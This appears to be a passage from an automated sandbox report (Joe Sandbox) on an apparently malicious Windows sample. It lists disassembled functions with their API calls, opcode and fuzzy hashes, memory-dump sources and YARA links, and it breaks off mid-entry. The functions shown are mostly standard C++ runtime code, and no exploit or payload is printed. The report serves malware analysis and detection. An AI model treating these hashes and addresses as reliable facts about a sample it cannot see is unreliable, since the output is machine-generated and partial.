                                    • Opcode Fuzzy Hash: 059406226580be624ed6c56c387c61032cef32238621074b8da740b116979db0
                                    • Instruction Fuzzy Hash: D10108358002159FCF00ABA8C8156ADBB65FF40321F640148FD10E7380DF70AA49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0086966B Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0086967C
                                    • int.LIBCPMT ref: 00869693
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • moneypunct.LIBCPMT ref: 008696B6
                                    • std::_Facet_Register.LIBCPMT ref: 008696CD
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 008696ED
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 008696FA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                    • String ID:
                                    • API String ID: 1973839345-0
                                    • Opcode ID: 04dfd185b954d6f8e110f07f8dab7d3df238257d69739c2438be1b38cd751180
                                    • Instruction ID: 292e01e6dfd7630eb228979f9af10306bbde61953e52b2d10e00d58e0acc881b
                                    • Opcode Fuzzy Hash: 04dfd185b954d6f8e110f07f8dab7d3df238257d69739c2438be1b38cd751180
                                    • Instruction Fuzzy Hash: DE01C0399102198BCF04ABA8D825AAD7B79FF94330F290149F951E72D1DF309A45C782
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00869700 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00869711
                                    • int.LIBCPMT ref: 00869728
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • moneypunct.LIBCPMT ref: 0086974B
                                    • std::_Facet_Register.LIBCPMT ref: 00869762
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00869782
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0086978F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                    • String ID:
                                    • API String ID: 1973839345-0
                                    • Opcode ID: fa4b20a42b90a39288efc2bf180769f7b20126af65a4852b270a88a1cde7e148
                                    • Instruction ID: f167ff60b4a76d1ae5b966108a56cabb160f4ed9baf16de8bff962371d818556
                                    • Opcode Fuzzy Hash: fa4b20a42b90a39288efc2bf180769f7b20126af65a4852b270a88a1cde7e148
                                    • Instruction Fuzzy Hash: F401A1359101159BCB04AFA888166ADB7A9FF84720F294149F951EB2D1DF309A45CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C8C4 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C8D5
                                    • int.LIBCPMT ref: 0085C8EC
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • numpunct.LIBCPMT ref: 0085C90F
                                    • std::_Facet_Register.LIBCPMT ref: 0085C926
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C946
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C953
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
                                    • String ID:
                                    • API String ID: 1910018792-0
                                    • Opcode ID: 3614e14635cac616773b98b4f2e352fc75a337249a0bcbeaed75cb21ae12d0c8
                                    • Instruction ID: 3c3479c3296e16a2a3a8401b15424cee85e1057bb26f6e05d9df9406b5eb4181
                                    • Opcode Fuzzy Hash: 3614e14635cac616773b98b4f2e352fc75a337249a0bcbeaed75cb21ae12d0c8
                                    • Instruction Fuzzy Hash: 4401C0759102199FCF05ABA8C855AAEBB79FF84321F280149FD10E7391DF709A49CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C959 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C96A
                                    • int.LIBCPMT ref: 0085C981
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • numpunct.LIBCPMT ref: 0085C9A4
                                    • std::_Facet_Register.LIBCPMT ref: 0085C9BB
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C9DB
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C9E8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
                                    • String ID:
                                    • API String ID: 1910018792-0
                                    • Opcode ID: ce52420dd9013a3bcd704d89c46065fb474bb71e7bfc33044f94733743fc9f74
                                    • Instruction ID: 5fe1c9fc6fd2f159e95ae4f99b2730f31ee6e06bd4c679dd7acde0676dc77d3a
                                    • Opcode Fuzzy Hash: ce52420dd9013a3bcd704d89c46065fb474bb71e7bfc33044f94733743fc9f74
                                    • Instruction Fuzzy Hash: 4001A1359002259BCB04EBA888156BD7B65FF84311F280149F951E7291DF349A49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00887946 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free_strpbrk
                                    • String ID: *?
                                    • API String ID: 3300345361-2564092906
                                    • Opcode ID: 1f1604e6da29bbee0dd1d8303786fb0bb85c85a3f4ace41fdd4ec8cfdfc78f07
                                    • Instruction ID: 40cdcf57f86259a8ac69215ca2b0c17e7a74d95c1988ecc884a37776095c1120
                                    • Opcode Fuzzy Hash: 1f1604e6da29bbee0dd1d8303786fb0bb85c85a3f4ace41fdd4ec8cfdfc78f07
                                    • Instruction Fuzzy Hash: 31610C75E042199FDB14DFA8C8819EEFBF5FF48314B24816AE815E7341E635EE418B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0084D84B Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 190COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: $column%d$rowid
                                    • API String ID: 4218353326-801954022
                                    • Opcode ID: 2da8fc6698a319d6c0fec98304004ac2a0bfed5a0118f390a93d0a0254c9c001
                                    • Instruction ID: a15e4dd9188b962ef311d5d6e74e6ade46c388adf03929ec49990de73b165ff2
                                    • Opcode Fuzzy Hash: 2da8fc6698a319d6c0fec98304004ac2a0bfed5a0118f390a93d0a0254c9c001
                                    • Instruction Fuzzy Hash: DF616B71E04319ABDB14CF68C881B6ABBF5FF58714F1441AAE845EB382D770AD41CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081171B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00811730
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0081176D
                                      • Part of subcall function 0085A8A9: _Yarn.LIBCPMT ref: 0085A8C8
                                      • Part of subcall function 0085A8A9: _Yarn.LIBCPMT ref: 0085A8EC
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 008117AE
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0081181F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Locinfo::_LockitYarn$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                    • String ID: bad locale name
                                    • API String ID: 2090653598-1405518554
                                    • Opcode ID: 96e0c4c046c7593ca8da5b250b660eb7467c3038b1fc8ba09230f8b66cd4bec4
                                    • Instruction ID: abbaf1bc55fe56c07c23704807294001c88453ba655fd1d7ec9177bcbd82b4cc
                                    • Opcode Fuzzy Hash: 96e0c4c046c7593ca8da5b250b660eb7467c3038b1fc8ba09230f8b66cd4bec4
                                    • Instruction Fuzzy Hash: 9D318D71804B00DECB35AF1ED841656FBF4FF58B20B508A3FE09AD2A41DB70A545CB5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0087215E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0087221F,?,?,008B4064,00000000,?,0087234A,00000004,InitializeCriticalSectionEx,0089BC58,0089BC60,00000000), ref: 008721EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID: api-ms-
                                    • API String ID: 3664257935-2084034818
                                    • Opcode ID: c0d8a8390726f778578996bac6fa3ec7cc716078688379bdb89413b3c58e1ce9
                                    • Instruction ID: 9e9cf1eb0a493db0ed9025a7a651606cac8dbf67643b80762b2b5106041473d9
                                    • Opcode Fuzzy Hash: c0d8a8390726f778578996bac6fa3ec7cc716078688379bdb89413b3c58e1ce9
                                    • Instruction Fuzzy Hash: 6311C631A05629EBDF225B68AC40B5933A4FF05774F554221FF19E7284D760FD0086E1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008727C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,008727B7,?,?,0087277F,?,?,?), ref: 008727D7
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008727EA
                                    • FreeLibrary.KERNEL32(00000000,?,?,008727B7,?,?,0087277F,?,?,?), ref: 0087280D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 311206fda3062d24419be0495628b260999987ed1a720bd41391952df974c57a
                                    • Instruction ID: 12f88fad2b98b32851fd60f267a865ae592d9bc98e76d3219d27e9c617c685a0
                                    • Opcode Fuzzy Hash: 311206fda3062d24419be0495628b260999987ed1a720bd41391952df974c57a
                                    • Instruction Fuzzy Hash: C9F01C31515619FBDB21ABA0EE0AB9E7B78FB0076AF184075B805E21A0CB758E40DA91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0086D67B Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 0086D706
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0086D794
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0086D806
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0086D820
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0086D883
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$Info
                                    • String ID:
                                    • API String ID: 1775632426-0
                                    • Opcode ID: 1b48474bde0f6af7ca6975dda1a60ea5499a7a8e868dbda989df3f958d0c0b19
                                    • Instruction ID: 4796424139f42dee9dbd1502a2603c8ea15c72102116a865cb603f4b94fb320c
                                    • Opcode Fuzzy Hash: 1b48474bde0f6af7ca6975dda1a60ea5499a7a8e868dbda989df3f958d0c0b19
                                    • Instruction Fuzzy Hash: BD71BE72E0035A9BDF219FA4DC45AEE7BB6FF09754F1A0425E804EB291D7218C00CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0087E9B6 Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0088255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0088838D,00000220,?,?,?,?,?,?,00873E8D,?), ref: 0088258E
                                    • _free.LIBCMT ref: 0087EAC5
                                    • _free.LIBCMT ref: 0087EADC
                                    • _free.LIBCMT ref: 0087EAF9
                                    • _free.LIBCMT ref: 0087EB14
                                    • _free.LIBCMT ref: 0087EB2B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$AllocateHeap
                                    • String ID:
                                    • API String ID: 3033488037-0
                                    • Opcode ID: b4cfc8ae81ffd1807234f475218f75ac44266fae335e342472a22ab6e9126531
                                    • Instruction ID: 39bac44bcd9bb7afa3bbe19c5f0458ff4d6a0913c658215411dba94d554b7e7d
                                    • Opcode Fuzzy Hash: b4cfc8ae81ffd1807234f475218f75ac44266fae335e342472a22ab6e9126531
                                    • Instruction Fuzzy Hash: 1A51D232A00714AFDB20EF2DCC42A6AB7F5FF59720F1485A9E40AE7254E731EE018B55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0083337C Relevance: 7.6, APIs: 5, Instructions: 121filesleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LockFile.KERNEL32(00000000,40000000,00000000,00000001,00000000), ref: 008333CC
                                    • Sleep.KERNEL32(00000001), ref: 008333DA
                                    • UnlockFile.KERNEL32(00000000,40000000,00000000,00000001,00000000), ref: 00833423
                                    • LockFile.KERNEL32(00000000,40000001,00000000,00000001,00000000), ref: 00833457
                                    • LockFile.KERNEL32(00000000,40000002,00000000,000001FE,00000000), ref: 00833492
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Lock$SleepUnlock
                                    • String ID:
                                    • API String ID: 1216273398-0
                                    • Opcode ID: 3cc3a101c883111a1d2e3f5100c8638186935ff7608238adb1fadd8f5ab0ff57
                                    • Instruction ID: d0a9331971dd24a120e9ef5a5724a0cc98dedd07fd6c00d2ea964f4420e07578
                                    • Opcode Fuzzy Hash: 3cc3a101c883111a1d2e3f5100c8638186935ff7608238adb1fadd8f5ab0ff57
                                    • Instruction Fuzzy Hash: 2031CF31B40715BBEB324B149C86B6ABA90FB90B64F14C125FE05FB2C0D7B1DE408AC8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00817A1E Relevance: 7.6, APIs: 5, Instructions: 95timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 00817A66
                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00817A95
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,008179FD,00000000), ref: 00817ABC
                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008179FD), ref: 00817ACA
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00817AFC
                                      • Part of subcall function 00817521: GetFileInformationByHandle.KERNEL32(?,?), ref: 00817535
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 89576305-0
                                    • Opcode ID: 3a7c54c38fcabd5cab048b985f67c0c417a9432c8389852237128e6ca83c6bb2
                                    • Instruction ID: e03daf032028508887eba9a9c8817a7507ca5d47e75cd5b7fa421a6aae3c5b8f
                                    • Opcode Fuzzy Hash: 3a7c54c38fcabd5cab048b985f67c0c417a9432c8389852237128e6ca83c6bb2
                                    • Instruction Fuzzy Hash: 883174B1904B04EFD725DF69C880AABBBF8FF04314F104A1EE596C2650E770A945CB20
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085B5E6 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Maklocstr$Maklocchr
                                    • String ID:
                                    • API String ID: 2020259771-0
                                    • Opcode ID: a24b2da19c1f1ddf1ba8d5d5cd08605ef4e35effc132c2ade5f9688f3a0635f1
                                    • Instruction ID: a17ac2f21651e8fae00e967b26f97484da549bcf795b5301eb40add960747fb5
                                    • Opcode Fuzzy Hash: a24b2da19c1f1ddf1ba8d5d5cd08605ef4e35effc132c2ade5f9688f3a0635f1
                                    • Instruction Fuzzy Hash: BF11CEF1900B847BE720DBA98881F12BBECFF29395F040529F644CBA40D364FC5887A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00857069 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085707A
                                    • int.LIBCPMT ref: 00857091
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 008570CB
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 008570EB
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 008570F8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: a4205d092a60bfd7ef93b3ac77de9181fcc1beff12bfcea2772a9028908b2ca1
                                    • Instruction ID: 320b9b7ce59aed2eee98c4eb4351bb9c0d4dabfe352df5079ec2ef506c22eb88
                                    • Opcode Fuzzy Hash: a4205d092a60bfd7ef93b3ac77de9181fcc1beff12bfcea2772a9028908b2ca1
                                    • Instruction Fuzzy Hash: 190100358045298BCB00EBA8D805AADBBB5FF84321F288109FC10E72C0CF309A49C782
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C1C8 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C1D9
                                    • int.LIBCPMT ref: 0085C1F0
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0085C22A
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C24A
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C257
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
